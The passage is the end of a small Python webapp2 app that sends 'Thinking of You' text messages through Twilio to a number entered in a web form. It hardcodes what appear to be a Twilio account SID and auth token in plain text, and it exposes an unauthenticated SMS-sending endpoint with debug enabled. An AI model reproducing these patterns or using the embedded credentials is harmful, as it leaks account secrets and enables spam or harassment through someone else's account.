extensions=['jinja2.ext.autoescape'])\n\n\naccount = \"ACb25ca21f061784336f896f03dc8d5bc0\"\ntoken = \"ec3c8c702590b4b63c2592817c378540\"\nclient = TwilioRestClient(account, token)\n\n\nclass MainPage(webapp2.RequestHandler):\n def get(self):\n template = JINJA_ENVIRONMENT.get_template('homelayout.html')\n self.response.write(template.render())\n\n def post(self):\n msg_body = \"Thinking of You\"\n trim_typed_msg = self.request.get('message').lstrip()\n if len(trim_typed_msg) > 0:\n msg_body = trim_typed_msg\n send_to_num = self.request.get('number')\n template = JINJA_ENVIRONMENT.get_template('sentlayout.html')\n if len(send_to_num) == 10:\n message = client.sms.messages.create(to=\"+1\" + send_to_num, from_=\"+12487825626\",\n body=msg_body)\n message = 'Message sent!'\n template_values = {\n 'message_line1': message,\n 'message_line2': \"\"\n }\n self.response.write(template.render(template_values))\n else:\n message_line1 = \"Invalid phone number.\"\n message_line2 = 
\"Please try again!\"\n template_values = {\n 'message_line1': message_line1,\n 'message_line2': message_line2\n }\n self.response.write(template.render(template_values))\n \n \nclass Funnel2(webapp2.RequestHandler):\n def post(self):\n template = JINJA_ENVIRONMENT.get_template('funnel2.html')\n self.response.write(template.render())\n \n \nclass Funnel3(webapp2.RequestHandler):\n def post(self):\n template = JINJA_ENVIRONMENT.get_template('funnel3.html')\n self.response.write(template.render())\n\n\napplication = webapp2.WSGIApplication([\n ('/', MainPage),\n ('/funnel2', Funnel2),\n ('/funnel3', Funnel3),\n], debug=True)\n\n\n\n\n\n\n\n","repo_name":"aperskystern/thinking-of-you","sub_path":"think.py","file_name":"think.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}